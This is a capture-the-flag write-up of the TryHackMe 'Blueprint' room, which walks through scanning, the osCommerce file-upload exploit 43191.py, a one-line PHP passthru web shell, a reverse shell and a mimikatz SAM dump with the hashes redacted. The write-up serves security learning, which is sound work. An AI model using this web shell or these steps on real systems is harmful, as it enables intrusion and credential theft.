Blueprint

This is a write-up for the machine on TryHackMe located at: https://tryhackme.com/room/blueprint.

The first thing I did was run an nmap scan:

sudo nmap -Pn -T4 -A -sS -p- 10.10.21.26 -oN output

This was my results from the scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-11 17:40 EDT
Nmap scan report for 10.10.21.26
Host is up (0.26s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/11%OT=80%CT=1%CU=42336%PV=Y%DS=4%DC=T%G=Y%TM=60EB693
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5
OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=Z%RUCK=0%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 4 hops
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m09s, deviation: 34m37s, median: -10s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:66:56:3b:ba:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-11T22:56:59+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-11T21:56:58
|_  start_date: 2021-07-11T21:20:08

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   37.64 ms  10.6.0.1
2   ... 3
4   132.33 ms 10.10.21.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 995.72 seconds

The first thing I did was go to the websites on port 80 and 443 to see what is going on there. I got the following result:

This seemed to be some sort of selling website so I was not sure if this is what I am looking for. Port 443 and 8080 lead me to the same result:

I then ran gobuster on the "oscommerce" url and got the following result:

gobuster dir -u http://10.10.21.26:8080/oscommerce-2.3.4/ -w ../resources/SecLists/Discovery/Web-Content/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.21.26:8080/oscommerce-2.3.4/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../resources/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/11 18:09:54 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 1044]
/.hta                 (Status: 403) [Size: 1044]
/.htpasswd            (Status: 403) [Size: 1044]
/aux                  (Status: 403) [Size: 1044]
/catalog              (Status: 301) [Size: 361] [--> http://10.10.21.26:8080/oscommerce-2.3.4/catalog/]
/com2                 (Status: 403) [Size: 1044]                                                       
/com3                 (Status: 403) [Size: 1044]                                                       
/com4                 (Status: 403) [Size: 1044]                                                       
/com1                 (Status: 403) [Size: 1044]                                                       
/con                  (Status: 403) [Size: 1044]                                                       
/docs                 (Status: 301) [Size: 358] [--> http://10.10.21.26:8080/oscommerce-2.3.4/docs/]   
/lpt1                 (Status: 403) [Size: 1044]                                                       
/lpt2                 (Status: 403) [Size: 1044]                                                       
/nul                  (Status: 403) [Size: 1044]                                                       
/prn                  (Status: 403) [Size: 1044]                                                       
                                                                                                       
===============================================================
2021/07/11 18:12:00 Finished
===============================================================

I was looking around the directories and did not find anything significant. A lot of the directories showed me the following page:

I then viewed this write-up, and realized that my search was missing the "Install" directory. I then ran a search using feroxbuster, and I got the result so much quicker:

[>-------------------] - 2m    369051/35278824 4h      found:150     errors:328839 
[###########>--------] - 2m    139024/239992  824/s   http://10.10.21.26:8080/oscommerce-2.3.4/
[###########>--------] - 2m    135880/239992  813/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog
[###########>--------] - 2m    137472/239992  822/s   http://10.10.21.26:8080/oscommerce-2.3.4/docs
[###########>--------] - 2m    136936/239992  821/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/includes
[##########>---------] - 2m    127784/239992  780/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/pub
[##########>---------] - 2m    131576/239992  804/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/install
[##########>---------] - 2m    131392/239992  802/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/images
[##########>---------] - 2m    130088/239992  806/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/Admin
[###########>--------] - 2m    137872/239992  864/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/includes/modules
[###########>--------] - 2m    136504/239992  857/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/Images
[###########>--------] - 2m    133424/239992  849/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/includes/classes
[##########>---------] - 2m    129936/239992  832/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/install/images
[##########>---------] - 2m    130256/239992  834/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/install/templates
[##########>---------] - 2m    130208/239992  833/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/install/includes
[##########>---------] - 2m    126328/239992  812/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/install/Images
[#########>----------] - 2m    119072/239992  773/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/ext
[##########>---------] - 2m    121480/239992  791/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/ext/modules
[##########>---------] - 2m    127736/239992  864/s   http://10.10.21.26:8080/oscommerce-2.3.4/Docs
[#########>----------] - 2m    118192/239992  804/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/Images/dvd
[#######>------------] - 1m     90280/239992  869/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/images/Default
[#####>--------------] - 1m     63352/239992  758/s   http://10.10.21.26:8080/oscommerce-2.3.4/catalog/Images/DVD

Here, I then saw the "Install" directory. This page was still the same as before:

I then saw the same write-up, and noticed that they used searchsploit in order to search for a vulnerability for the machine. I then got this result:

I wanted to try out the Arbitrary File Upload first. To get this in my current directory, I ran the following commands:

searchsploit -p php/webapps/43191.py #Shows the full path for the code
cp /usr/share/exploitdb/exploits/php/webapps/43191.py . #copies it to the local directory

I ran the code just by itself to see what parameters it was looking for:

I noticed that I needed a target (at least), authentication, and file. I tried to enter in just the target argument. I then realized I did not have the username and password for the authentication. I then went back to the install page in the catalog directory:

I then clicked on the start button to see what it did. I entered root for the username and the Database Name and then press continue:

I tried admin for the Username, and I ran into an error. I then tried root and it worked! I then set the Online Store Settings like:

All the previous setup for the commerce site was based off of the same write-up. I then got the following page:

I was then lost about where to go from here. I then looked at the write-up and learned that I had to upload a basic PHP file:

<?php passthru($_GET['cmd']);
?>

I then ran the python file with the modules:

I then realized I had made a mistake. In my python command, I had added a "/" in the URL when I was not supposed to do so. After that, I was successful:

I will be honest, at this part, I had to look back at the write-up because I was out of the TryHackMe game for a while, and was not sure what to do. The next item I had to do was get a reverse shell on the machine. In order to do this, I would have to use msfvenom in order to do so:

Now I can run a netcat listener and then go to the webpage with the executable on it:

I then ran systeminfo in order to gain information about the system. I then got the following result:

Host Name:                 BLUEPRINT
OS Name:                   Microsoft Windows 7 Home Basic 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00346-OEM-8992752-50005
Original Install Date:     1/15/2017, 6:48:59 AM
System Boot Time:          7/11/2021, 10:19:59 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,048 MB
Available Physical Memory: 1,317 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,112 MB
Virtual Memory: In Use:    983 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
                           [03]: KB4012215
Network Card(s):           1 NIC(s) Installed.
                           [01]: Citrix PV Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.21.26
                                 [02]: fe80::1565:9838:2ad3:4231

I then had to upload mimikatz to the Windows machine. I had to first find the location of mikikatz on the machine:

I was looking for the mimikatz.exe file. I then had to upload the file to the machine:

I was then able to access mimikatz on the machine:

I got the following output when I ran lsadump::sam:

mimikatz # lsadump::sam
Domain : BLUEPRINT
SysKey : <REDACTED>
Local SID : S-1-5-21-3130159037-241736515-3168549210

SAMKey : <REDACTED>

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: <REDACTED>

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : Lab
  Hash NTLM: <REDACTED>

Using crackstation, I was able to crack one of the two hashes:

This was the answer to one of the questions on the machine. The second answer was the root.txt file "password". I got to this through changing directory by "cd-ing" into the directory and then running the following command:

C:\Users\Administrator\Desktop>type root.txt.txt

I then solved the room!

Last updated